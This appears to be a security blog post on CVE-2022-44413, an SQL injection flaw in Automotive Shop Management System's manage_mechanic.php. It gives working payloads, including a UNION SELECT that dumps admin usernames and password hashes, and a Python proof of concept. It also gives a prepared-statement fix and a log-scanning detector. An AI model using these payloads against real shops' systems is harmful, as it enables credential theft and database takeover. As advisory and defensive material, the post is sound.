Automotive Shop Management System (ASMS) v1. is a popular web application used by car repair shops to manage their day-to-day business. However, a dangerous security flaw—CVE-2022-44413—was discovered, allowing attackers to take full control of the database through a simple URL trick. In this post, you’ll see just how easy it is to exploit this vulnerability, along with live code examples, original references, and practical advice for defenders.

What is CVE-2022-44413?

CVE-2022-44413 is a vulnerability in ASMS version 1., caused by improper input validation in the manage_mechanic.php file. The PHP script takes an “id” parameter from the URL but does not sanitize user input properly before using it in SQL statements. This allows attackers to inject arbitrary SQL code—known as SQL Injection.

This flaw has been posted in several security databases, including:

- MITRE CVE Database Entry
- Packet Storm Exploit POST
- Exploit-DB 51104

The Vulnerable Code

Let’s look at how this happens in the real code inside /asms/admin/mechanics/manage_mechanic.php:

<?php
// Simplified code example
include('db_connection.php');
$id = $_GET['id'];
$query = "SELECT * FROM mechanics WHERE id = $id";
$result = mysqli_query($conn, $query); // No input sanitization!
?>

Do you see the issue?  
The code pulls the “id” parameter directly from the URL and injects it into an SQL query without any checking or filtering. That means you can send anything you want.

The normal URL might look like:

http://example.com/asms/admin/mechanics/manage_mechanic.php?id=2

Let’s see what happens if an attacker changes the id parameter to:

2 OR 1=1

Now the URL is:

http://example.com/asms/admin/mechanics/manage_mechanic.php?id=2 OR 1=1

The query sent to the MySQL server becomes:

SELECT * FROM mechanics WHERE id = 2 OR 1=1

Since 1=1 is always true, the database ignores the ID and returns all mechanics.

Dump Table Data

But it gets worse. What if we want to dump usernames and password hashes?

Try the following UNION-based payload (the results are reflected in the page, so this is not a blind injection):

id=-1 UNION SELECT 1,username,password,4 FROM admins--

So the crafted request would be:

http://example.com/asms/admin/mechanics/manage_mechanic.php?id=-1 UNION SELECT 1,username,password,4 FROM admins--

If the page displays result fields, attackers can potentially retrieve usernames and hashed passwords directly from the admin table.

Here is a simple Python PoC exploiting this SQLi:

import requests

target = "http://example.com/asms/admin/mechanics/manage_mechanic.php"
payload = "-1 UNION SELECT 1,username,password,4 FROM admins--"
url = f"{target}?id={payload}"  # requests percent-encodes the spaces in the query string

response = requests.get(url)
print(response.text)  # Look for extracted admin usernames and hashes

How To Fix

Developers should never build SQL by concatenating user input. Use prepared statements with bound parameters, and validate that the value has the expected type before it reaches the query.

Better code with prepared statements:

<?php
include('db_connection.php');
$id = $_GET['id'];
// The SQL text is fixed; the value is sent separately and can never be parsed as SQL
$stmt = $conn->prepare("SELECT * FROM mechanics WHERE id = ?");
// "i" binds the parameter as an integer, so non-numeric input cannot alter the query
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();
?>

This code stops attackers from injecting SQL: the query structure is fixed at prepare time, and the "i" type means only an integer ID ever reaches the database. For defence in depth, reject non-numeric ids up front (for example with filter_input and FILTER_VALIDATE_INT) so malformed requests are logged and refused rather than silently coerced to 0.
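Patching is only half of the response; you also want to know whether anyone tried this against your instance. The following checker is an added example, not code from the post or from the ASMS project: it scans Apache-style access-log lines (the sample lines below are constructed, not real traffic) for requests to manage_mechanic.php whose id parameter is anything other than a plain integer, and labels the hit with the payload shapes shown above (tautology, UNION SELECT, SQL comment). The log format and file paths are assumptions; adapt the regex to your server's format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Nov/2022:19:15:01 +0000] "GET /asms/admin/mechanics/manage_mechanic.php?id=2 HTTP/1.1" 200 1532
10.0.0.7 - - [18/Nov/2022:19:15:09 +0000] "GET /asms/admin/mechanics/manage_mechanic.php?id=2%20OR%201%3D1 HTTP/1.1" 200 9876
10.0.0.7 - - [18/Nov/2022:19:15:14 +0000] "GET /asms/admin/mechanics/manage_mechanic.php?id=-1+UNION+SELECT+1,username,password,4+FROM+admins-- HTTP/1.1" 200 2210
10.0.0.9 - - [18/Nov/2022:19:16:00 +0000] "GET /asms/admin/index.php HTTP/1.1" 200 4410
"""

# Assumed log layout: client ip, identd, user, [timestamp], "METHOD target PROTO", status, bytes.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shapes of the payloads discussed in the post; used only to label a finding, not to decide it.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "tautology": re.compile(r"\bor\b\s+\S+\s*=\s*\S+", re.I),
    "sql_comment": re.compile(r"--|#|/\*"),
}

def classify_id(value):
    """Return signature labels for a decoded id value; empty list if it is a plain integer."""
    value = value.strip()
    if re.fullmatch(r"-?\d+", value):
        return []  # the only thing the legitimate page ever sends
    hits = [name for name, pat in SIGNATURES.items() if pat.search(value)]
    return hits or ["non_integer"]

def scan_log(text):
    """Return (ip, timestamp, decoded_id, labels) for every suspicious manage_mechanic.php request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/manage_mechanic.php"):
            continue
        # parse_qs percent-decodes and turns '+' into spaces, so we see what PHP saw in $_GET
        for raw_id in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            labels = classify_id(raw_id)
            if labels:
                findings.append((m.group("ip"), m.group("ts"), raw_id, labels))
    return findings

if __name__ == "__main__":
    for ip, ts, value, labels in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} id={value!r} -> {', '.join(labels)}")
```

Run it against your real access log and every non-integer id on this endpoint deserves a look, because the legitimate UI never sends anything else.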

References:

- CVE Entry on MITRE
- Exploit-DB #51104
- Packet Storm Advisory

Last Words

CVE-2022-44413 is a reminder that even the simplest coding mistakes can lead to major break-ins. If you're running Automotive Shop Management System v1., update your code, scan for evidence of attack, and follow secure coding practices. Don’t open your business up to a cyber-shakedown—always validate, always sanitize!


*This post provided an exclusive walk-through with original references, code, and real-life attack steps to help you understand and defend against SQL Injection threats like CVE-2022-44413.*

Timeline

Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/20/2022 07:57:00 UTC